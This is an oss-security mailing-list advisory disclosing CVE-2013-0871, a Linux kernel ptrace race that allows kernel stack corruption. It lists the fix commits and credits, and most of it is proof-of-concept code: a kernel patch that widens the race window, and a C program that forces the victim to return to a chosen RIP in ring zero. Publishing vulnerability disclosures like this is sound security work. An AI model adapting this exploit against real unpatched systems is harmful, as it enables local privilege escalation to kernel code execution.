Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 15 Feb 2013 12:24:18 -0800
From: Julien Tinnes <julien@....org>
To: oss-security@...ts.openwall.com
Subject: Linux kernel race condition with PTRACE_SETREGS (CVE-2013-0871)

Linux kernel stack corruption due to race condition with PTRACE_SETREGS
-----------------------------------------------------------------------

A race condition in ptrace can lead to kernel stack corruption and arbitrary
kernel-mode code execution.

This should be tracked as CVE-2013-0871.

Solution
------------

The following commits from Oleg Nesterov should address the issue:

- 910ffdb18a6408e14febbb6e4b6840fd2c928c82
- 9899d11f654474d2d54ea52ceaa2a1f4db3abd68
- 9067ac85d533651b98c2ff903182a20cbb361fcb

Credit
---------

This was discovered by Suleiman Souhlal and Salman Qazi of Google, with help
from Aaron Durbin and Michael Davidson, also of Google.

Code
--------

Salman Qazi provided the following PoC code:

Kernel patch for easy reproduction:

diff --git a/arch/x86/kernel/ptrace.c b/arch/x86/kernel/ptrace.c
index b629bbe..e22617e 100644
--- a/arch/x86/kernel/ptrace.c
+++ b/arch/x86/kernel/ptrace.c
@@ -24,6 +24,7 @@
 #include <linux/rcupdate.h>
 #include <linux/module.h>
 #include <linux/context_tracking.h>
+#include <linux/delay.h>

 #include <asm/uaccess.h>
 #include <asm/pgtable.h>
@@ -902,6 +903,12 @@ long arch_ptrace(struct task_struct *child, long request,
                                           datap);

        case PTRACE_SETREGS:    /* Set all gp regs in the child. */
+               if (!strcmp(current->comm, "ptrace_death")) {
+                       int i;
+                       WARN_ON_ONCE(1);
+                       for (i = 0 ; i < 15; i++)
+                               mdelay(10);
+               }
                return copy_regset_from_user(child,
                                             task_user_regset_view(current),
                                             REGSET_GENERAL,

source code for ptrace_death:


/*
 * Repro case for SETREGS arbitrary ring zero execution bug.
 *
 * The specific scenario that we attempt to create:
 *
 * V does a syscall.  It is being traced by P.  P
 * upon stopping V with PTRACE_SYSCALL and waiting for it, proceeds
 * to read its registers.  At this time P is asleep and an RT process S
 * starts running.
 *
 * Then P proceeds to write V's registers, and shortly after it has done this
 * another process K kills V.  Process S goes to sleep permitting V
 * space to run.  V wakes up from its waiting state and heads for the exit.
 *  But, S quickly wakes up again by the time V has reached schedule().  V
 * is no longer running (since S has the CPU)
 *  and P modifies its regs.  When V finally starts running
 * and returns from schedule(), it pops an incorrect value from the
 * stack.  The reason is that the stack on which schedule() is called
 * does not have the final 6 registers in pt_regs on it.  That means that
 * when P modifies V's registers, it is actually overwriting the stack
 * frame saved for schedule(), including the return RIP.
 *
 * V and S are pinned to CPU 0.  S is an RT task so that it can control
 * when V does and doesn't run.
 * The remaining processes are not allowed on CPU 0.
 *
 */


#define _GNU_SOURCE     /* for the sched_setaffinity() prototype */
#include <sched.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
#include <signal.h>
#include <unistd.h>

/*
 * S: fork the real-time helper that hogs CPU 0.
 *
 * The child switches itself to SCHED_FIFO at the minimum FIFO priority,
 * pins itself to CPU 0, sleeps for 120 ms and then spins forever.  On the
 * 50000th spin iteration it sleeps once for 10 us and prints "x"; that
 * short sleep is the window in which other tasks on CPU 0 get to run.
 * The child never returns from this function; it is expected to be
 * killed by the caller.
 *
 * Returns fork()'s result to the caller: the child's pid, or -1 if the
 * fork failed.  Callers must check for -1 before passing the value to
 * kill().
 */
int nuke_cpu(void)
{
        unsigned long mask = 1;         /* raw affinity bitmask; bit 0 = CPU 0 */
        int pid0;

        pid0 = fork();
        if (pid0 < 0) {
                perror("fork");
                return pid0;
        }

        if (pid0 == 0) {
                struct sched_param p = {0};
                /* Unsigned so the endless increment wraps instead of overflowing. */
                unsigned int i = 0;

                /*
                 * These calls are made outside assert() so they are not
                 * compiled out when NDEBUG is defined.
                 */
                p.sched_priority = sched_get_priority_min(SCHED_FIFO);
                if (sched_setscheduler(0, SCHED_FIFO, &p)) {
                        perror("sched_setscheduler");
                        abort();
                }
                if (sched_setaffinity(0, sizeof(mask), (const void *)&mask)) {
                        perror("sched_setaffinity");
                        abort();
                }

                usleep(120000);
                while (1) {
                        if (i == 50000) {
                                usleep(10);
                                printf("x");
                                fflush(stdout);
                        }
                        i++;
                }
        }

        return pid0;
}


/*
 * Run a single attempt at the race.  Does not return: the victim child
 * loops until it is killed and the tracer ends with exit(0).
 *
 * Processes involved:
 *   V - forked here while pinned to CPU 0; loads 0x1eadbeef into
 *       rbx, rbp and r12-r15 and issues syscall 0x6d in a loop.
 *   P - this process after the fork; moves itself to affinity mask
 *       0xfffe, attaches to V, stops it at the next syscall stop, reads
 *       its registers and writes them back with orig_rax set to 0x3c.
 *   S - started through nuke_cpu().
 *   K - forked from P; sleeps 120 ms, then sends SIGKILL to V.
 *
 * Progress markers on stdout: "{" before PTRACE_SETREGS, "+" / "-" for
 * its success / failure, "." once K has sent the kill.
 */
int once()
{
        int pid;
        int nuke_pid;
        int pid2;
        unsigned long mask = 1;         /* raw affinity bitmask; bit 0 = CPU 0 */
        struct user_regs_struct regs;

        /*
         * All setup calls are checked explicitly rather than inside
         * assert(), so they still run when NDEBUG is defined.
         */
        if (sched_setaffinity(0, sizeof(mask), (const void *)&mask)) {
                perror("sched_setaffinity");
                abort();
        }

        pid = fork();
        if (pid < 0) {
                perror("fork");
                abort();
        }

        if (!pid) {
                /* V */
                while (1) {
                        /* Put our chosen RIP in callee saved registers */
                        asm __volatile__ (
                                "mov $0x1eadbeef, %%rbx\n"
                                "mov $0x1eadbeef, %%rbp\n"
                                "mov $0x1eadbeef, %%r12\n"
                                "mov $0x1eadbeef, %%r13\n"
                                "mov $0x1eadbeef, %%r14\n"
                                "mov $0x1eadbeef, %%r15\n"
                                "mov $0, %%rsi\n"
                                "mov $0, %%rdi\n"
                                "mov $0x6d, %%rax\n"
                                "syscall":::"rax","rsi","rdi",
                                                "r12", "rbx");

                }
        }

        /* P */
        if (ptrace(PTRACE_ATTACH, pid, 0, 0)) {
                perror("ptrace(PTRACE_ATTACH)");
                abort();
        }
        wait(NULL);
        if (ptrace(PTRACE_SETOPTIONS, pid, NULL,
                   PTRACE_O_TRACESYSGOOD |
                   PTRACE_O_TRACEFORK |
                   PTRACE_O_TRACEVFORK |
                   PTRACE_O_TRACECLONE)) {
                perror("ptrace(PTRACE_SETOPTIONS)");
                abort();
        }

        /* Move P onto the CPUs in mask 0xfffe (every bit except CPU 0). */
        mask = 0xfffe;
        if (sched_setaffinity(0, sizeof(mask), (const void *)&mask)) {
                perror("sched_setaffinity");
                abort();
        }

        /* Entry */
        if (ptrace(PTRACE_SYSCALL, pid, NULL, 0, 0)) {
                perror("ptrace(PTRACE_SYSCALL)");
                abort();
        }
        wait(NULL);
        if (ptrace(PTRACE_GETREGS, pid, NULL, &regs)) {
                perror("ptrace(PTRACE_GETREGS)");
                abort();
        }

        nuke_pid = nuke_cpu();

        /* Syscall number to write back; 0x3c is exit in the x86-64 table. */
        regs.orig_rax = 0x3c;

        pid2 = fork();
        if (!pid2) {
                /* K */
                usleep(120000);
                kill(pid, SIGKILL);
                printf(".");
                fflush(stdout);
                exit(0);
        }

        printf("{");
        fflush(stdout);
        if (!ptrace(PTRACE_SETREGS, pid, NULL, &regs)) {
                printf("+");
        } else {
                printf("-");
        }

        /*
         * NOTE(review): the data argument here is 0, so this call itself
         * requests no signal; the trailing SIGKILL looks like an extra
         * variadic argument.  Left as written; the explicit kill() below
         * delivers the signal.
         */
        ptrace(PTRACE_CONT, pid, NULL, 0, SIGKILL);
        kill(pid, SIGKILL);

        /*
         * A failed fork leaves -1 in pid2 / nuke_pid, and kill(-1, ...)
         * would signal every process we are allowed to signal.
         */
        if (pid2 > 0) {
                kill(pid2, SIGKILL);
        }
        if (nuke_pid > 0) {
                kill(nuke_pid, SIGKILL);
        }
        exit(0);
}

/*
 * Driver: run once() in a fresh child process, wait for a child to
 * terminate, and repeat indefinitely.
 *
 * Returns EXIT_FAILURE if fork() fails; otherwise it loops until the
 * process is stopped from outside.
 */
int main(void) {

        while (1) {
                int pid = fork();

                if (pid < 0) {
                        /*
                         * With no child to reap, wait() would return at
                         * once and this loop would spin on fork().
                         */
                        perror("fork");
                        return EXIT_FAILURE;
                }
                if (!pid) {
                        once();
                        /*
                         * once() is not expected to return; make sure a
                         * child can never fall into the fork loop.
                         */
                        exit(EXIT_FAILURE);
                }
                wait(NULL);
        }
}

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.